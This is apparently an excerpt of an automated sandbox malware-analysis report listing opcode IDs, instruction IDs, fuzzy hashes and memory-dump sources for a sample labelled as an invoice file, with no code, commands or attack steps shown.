                                                                                                                                        • Instruction ID: 1baa108a97028868e269b3b2110305eec6039a3a57c88e3ab18fc43b041aeeec
                                                                                                                                        • Opcode Fuzzy Hash: 32ef610a1eb73c32cf103f0e676e881a8fdf2f22a66a87b5f9cc385e353c458b
                                                                                                                                        • Instruction Fuzzy Hash: 4AF024368002486FD6217A1DEC4CB5ABBD9FF90714F09485EF9D42F2218678AC80C784
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 38c4d1b775e50c23c97607e6d6cfdde6e93cd8374e2ef358810eb07e66c31202
                                                                                                                                        • Instruction ID: 5d8bdcc14104591457f0637f8d554e724e833dc5e43d6c3ec9195286cc769f15
                                                                                                                                        • Opcode Fuzzy Hash: 38c4d1b775e50c23c97607e6d6cfdde6e93cd8374e2ef358810eb07e66c31202
                                                                                                                                        • Instruction Fuzzy Hash: 12F06270A0124EEFDB44EF69D655A9EB7F4FF58300F008056B995EB385DA38EA01CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ddb6f598010ca1a2f9b5a401090cc2a44b224b1627e68d499fb084d2deb95efc
                                                                                                                                        • Instruction ID: 78b225c2f89b670684dff53496446dba8933bee25b5edce1746b086d79a72d15
                                                                                                                                        • Opcode Fuzzy Hash: ddb6f598010ca1a2f9b5a401090cc2a44b224b1627e68d499fb084d2deb95efc
                                                                                                                                        • Instruction Fuzzy Hash: 94F0F031C022DD8ED7228B18C444B7377C4AF10BB0F0C486AC69993121C364FC80E640
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5086e766ad049732654df51e28bd97f1e93829c335beb1a0af572d21882aca07
                                                                                                                                        • Instruction ID: b39aca836b86da0a717ab70541825cade026a19d3170853b692bca5f4098b9ac
                                                                                                                                        • Opcode Fuzzy Hash: 5086e766ad049732654df51e28bd97f1e93829c335beb1a0af572d21882aca07
                                                                                                                                        • Instruction Fuzzy Hash: D4F027764156850ACB766B6DB4E02D62FF8A761520F4918C9D4E05B20AC57F8883C720
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 534b8bc0a5e8871aa5b6fde5161fe91e542025c61477afcc578fbd93a1bfd998
                                                                                                                                        • Instruction ID: af7aa4c5c70cc8807f60a7cd78481b269a9c0bbb7da9a6be92a9983d1ba7ef9f
                                                                                                                                        • Opcode Fuzzy Hash: 534b8bc0a5e8871aa5b6fde5161fe91e542025c61477afcc578fbd93a1bfd998
                                                                                                                                        • Instruction Fuzzy Hash: 44F02E714012A28FF3B2971CC30CB597BD8AB08BA0F0894E5C48A83202C3A0E880CA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                        • Instruction ID: 1d413c59e67891dc9f46c295eafcedce0f19158486f786a5ade047072c48481a
                                                                                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                        • Instruction Fuzzy Hash: B6E0D8323006412BE7129F598CC4F8777AEDFD6B10F04047DB5445F291C9E2DC0986A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                        • Instruction ID: 4abf74f70567ceb7061c5594fd0468a20a6c3d2820552343e959a8cc6f0f839a
                                                                                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                        • Instruction Fuzzy Hash: A3E0EC35950788AFDF53EF59CA40F5ABBF9BF84B40F150054A1485B661C634A900CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                        • Instruction ID: bec0a68c4593bffb8190d7eb6235c6d34eb4826d4debf97c12f967d10b1b1a08
                                                                                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                        • Instruction Fuzzy Hash: DFD022332160B097CB2A56626800FA36906AF80BA4F1A002C340AD3800C0088C42E6E1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                        • Instruction ID: 0cbf80ce6717215bfab9f2bc8c5af78d49b2b95b8c07b2dff9511c726a9a4c20
                                                                                                                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                        • Instruction Fuzzy Hash: 04D012371D054DBBDB129F66DC01F957BA9E764BA0F444020B504CB5A0C63AE950D684
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b57a01f4ce39096f8b218f98f5dacf7e05f040da59a8f6ca63f33747df05edb5
                                                                                                                                        • Instruction ID: a69dc4cec4428ba3b7a4f378ff4df6a8f717c13eb0df050524ad60c3760d4d8e
                                                                                                                                        • Opcode Fuzzy Hash: b57a01f4ce39096f8b218f98f5dacf7e05f040da59a8f6ca63f33747df05edb5
                                                                                                                                        • Instruction Fuzzy Hash: 7ED052306126568BEF2BCB09CA14E7E3AB8FB24A44F4000A8E6C096020E72AD8018A00
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                        • Instruction ID: 374f7d52aebc68f6fe64c927f43fcb1a344804fb05c345ee34a399ae61a29703
                                                                                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                        • Instruction Fuzzy Hash: CFD09235212A80CFE69BCB0CC5A4B1633E4BB84B84F8104D0E481CBB66E628D980CA00
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                        • Instruction ID: 8f60ed2a4c1bb9eb4788a6124aaa29372c32fdcc4477e632381ba96d49f69f95
                                                                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                        • Instruction Fuzzy Hash: 27C01232290A48AFD712AA99CD01F427BA9EBA8B40F000021F2048B6B0C631E820EA84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                        • Instruction ID: 106ce6fa19eb36003dec37e24117e681c838562cf18c9e703f60fda9492b29ce
                                                                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                        • Instruction Fuzzy Hash: 6FD01236100248EFCB01DF41C890D9A773AFBD8710F108019FD190B6148A35ED62DA50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                        • Instruction ID: 847f9caeb37eb35e485e96c83880ed9b868628a1477f33e74833392ca3804160
                                                                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                        • Instruction Fuzzy Hash: 9DC04C757015458FDF16DB19D2D4F4577E4F754740F1508D0E985CB721E624E801CA10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                                        • Instruction ID: 9ab0943761e28d5d850000f02ecadfa0dfb131487a6293451163c6eccedd8e90
                                                                                                                                        • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                                        • Instruction Fuzzy Hash: B6B01232212545DFC7026720CB00B9C32B9BF017C0F0900F0A94089830D61C8910E501
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a4fb1a0fc6d63632c8ce3e8e0591ed774159ce5613b38754fa804cc6fbfdcf6a
                                                                                                                                        • Instruction ID: 6ed884a456d6ed48003b8495bfd17ed5016b4d182250275925ab129a8f25b35c
                                                                                                                                        • Opcode Fuzzy Hash: a4fb1a0fc6d63632c8ce3e8e0591ed774159ce5613b38754fa804cc6fbfdcf6a
                                                                                                                                        • Instruction Fuzzy Hash: B090027160580013A140719888C45464005A7E0301B55C422E0824554CCA548A665361
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8efa2ed20b1645e4f77e9629b9b8d38c6995740635b46db02b0564f0a38efab9
                                                                                                                                        • Instruction ID: bd0a01efd59f3ffd67c9feade49e33fd4b5caee06417c98796404782034f0400
                                                                                                                                        • Opcode Fuzzy Hash: 8efa2ed20b1645e4f77e9629b9b8d38c6995740635b46db02b0564f0a38efab9
                                                                                                                                        • Instruction Fuzzy Hash: 7F9002A1601500435140719888444066005A7E1301395C526A0954560CC65889659369
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ee4cbd0bf5eca6114213bbfe2b7dc8d99d4703dc08af0684bd008d12a3e0cbba
                                                                                                                                        • Instruction ID: ea8c6a85c5617f5909b17a4f0201116e4a09ff6582fd705af6bb279920e27a30
                                                                                                                                        • Opcode Fuzzy Hash: ee4cbd0bf5eca6114213bbfe2b7dc8d99d4703dc08af0684bd008d12a3e0cbba
                                                                                                                                        • Instruction Fuzzy Hash: E490027120140803E10471988844686000597D0301F55C422A6424655ED6A589A17231
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4ff93fe1da4bbda4e876413a9f5b4b034905e6f66627cc99c76b2d7ec0ebfc6a
                                                                                                                                        • Instruction ID: 8a1f8da043ed0925b2b77c18d4474debcd34ac44fe89f81ce1bef2681c3622c9
                                                                                                                                        • Opcode Fuzzy Hash: 4ff93fe1da4bbda4e876413a9f5b4b034905e6f66627cc99c76b2d7ec0ebfc6a
                                                                                                                                        • Instruction Fuzzy Hash: BC90027160540803E15071988454746000597D0301F55C422A0424654DC7958B6577A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d96aaa8c8ef5a9b99074ab2555481b357ca087b289c991a9ac960612709c0fb8
                                                                                                                                        • Instruction ID: 6ecc857656f972ed8fb75eed0b93a05e391162901e9ee151a58dee9fb0e03966
                                                                                                                                        • Opcode Fuzzy Hash: d96aaa8c8ef5a9b99074ab2555481b357ca087b289c991a9ac960612709c0fb8
                                                                                                                                        • Instruction Fuzzy Hash: 5790027120544843E14071988444A46001597D0305F55C422A0464694DD6658E65B761
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a242bd425b99f35a36d7403d12b9cd6c0f27ada71decf1e0ff35980e26470354
                                                                                                                                        • Instruction ID: f998dc4007b8819e9da224a9b009827087672a2e75816cbf953742a4ea475e8f
                                                                                                                                        • Opcode Fuzzy Hash: a242bd425b99f35a36d7403d12b9cd6c0f27ada71decf1e0ff35980e26470354
                                                                                                                                        • Instruction Fuzzy Hash: 4E90027120140803E1807198844464A000597D1301F95C426A0425654DCA558B6977A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a2d3e7290b8a6a836e6667f20743c164207a2bb8e29af48f23b8d82c309cbd3d
                                                                                                                                        • Instruction ID: e09425636366719d490520cde732b85685a1c6204079f11c878a0cfa50abe155
                                                                                                                                        • Opcode Fuzzy Hash: a2d3e7290b8a6a836e6667f20743c164207a2bb8e29af48f23b8d82c309cbd3d
                                                                                                                                        • Instruction Fuzzy Hash: 069002E1201540935500B298C444B0A450597E0201B55C427E1454560CC56589619235
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dd1e19d159a6a7c21f330a157b10ab341c2c5ea54efd9849245b10a677ca0472
                                                                                                                                        • Instruction ID: 2339d5efcf3ad2e7ba255abc330044706af6e943d5d8f0350c3ba32c5047eff8
                                                                                                                                        • Opcode Fuzzy Hash: dd1e19d159a6a7c21f330a157b10ab341c2c5ea54efd9849245b10a677ca0472
                                                                                                                                        • Instruction Fuzzy Hash: 2C900475311400031105F5DC47445070047D7D5351355C433F1415550CD771CD715331
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8d9c6bec91c9fe56ddf832e5a55ac7ea8fb4a09c0801afefe3c6301350eefdb8
                                                                                                                                        • Instruction ID: e66c384d0007bc5c929a23fe0ca3516fa25ffa86665cbc93b5894f016e6bb2f6
                                                                                                                                        • Opcode Fuzzy Hash: 8d9c6bec91c9fe56ddf832e5a55ac7ea8fb4a09c0801afefe3c6301350eefdb8
                                                                                                                                        • Instruction Fuzzy Hash: D7900265221400031145B598464450B0445A7D6351395C426F1816590CC66189755321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d47a867c24d20bddd0a0c1fda25cb42821148c6ab1a06ad2af50be5c976dfb06
                                                                                                                                        • Instruction ID: 54c8a378e9ab471c6b555c6536fcd06fb2ad28844b2e0b87c8c3db8c84627a05
                                                                                                                                        • Opcode Fuzzy Hash: d47a867c24d20bddd0a0c1fda25cb42821148c6ab1a06ad2af50be5c976dfb06
                                                                                                                                        • Instruction Fuzzy Hash: E590026120544443E10075989448A06000597D0205F55D422A1464595DC6758961A231
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b075b5043f4e29e187f2cf99f859817ce3dc2b56add67acdbda7b2eeb5aa0d0e
                                                                                                                                        • Instruction ID: 4d99ff766b07f489a75c107d0cff2cf1ecfff1965cb0ed9f21556a33f0b0a967
                                                                                                                                        • Opcode Fuzzy Hash: b075b5043f4e29e187f2cf99f859817ce3dc2b56add67acdbda7b2eeb5aa0d0e
                                                                                                                                        • Instruction Fuzzy Hash: 7490026921340003E1807198944860A000597D1202F95D826A0415558CC95589795321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 97df8a36a51da83d4ad2a2451e91e6cab48911137dfb7a658bdce89c8b186e39
                                                                                                                                        • Instruction ID: a3872b954ad6b87103acbb62628be27c6439100badf7d8cce07b44341e5a593b
                                                                                                                                        • Opcode Fuzzy Hash: 97df8a36a51da83d4ad2a2451e91e6cab48911137dfb7a658bdce89c8b186e39
                                                                                                                                        • Instruction Fuzzy Hash: 7490026130140003E140719894586064005E7E1301F55D422E0814554CD95589665322
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 400ee52a8ade53b3de72081ad449e1de7fc6c8a9af8541b05d3d5fc96142959e
                                                                                                                                        • Instruction ID: ffcadf5e24c62f71f835eeceb4a8a3122a373583a02e88e0f175070b0d51d2ee
                                                                                                                                        • Opcode Fuzzy Hash: 400ee52a8ade53b3de72081ad449e1de7fc6c8a9af8541b05d3d5fc96142959e
                                                                                                                                        • Instruction Fuzzy Hash: 7A90027124140403E141719884446060009A7D0241F95C423A0824554EC6958B66AB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
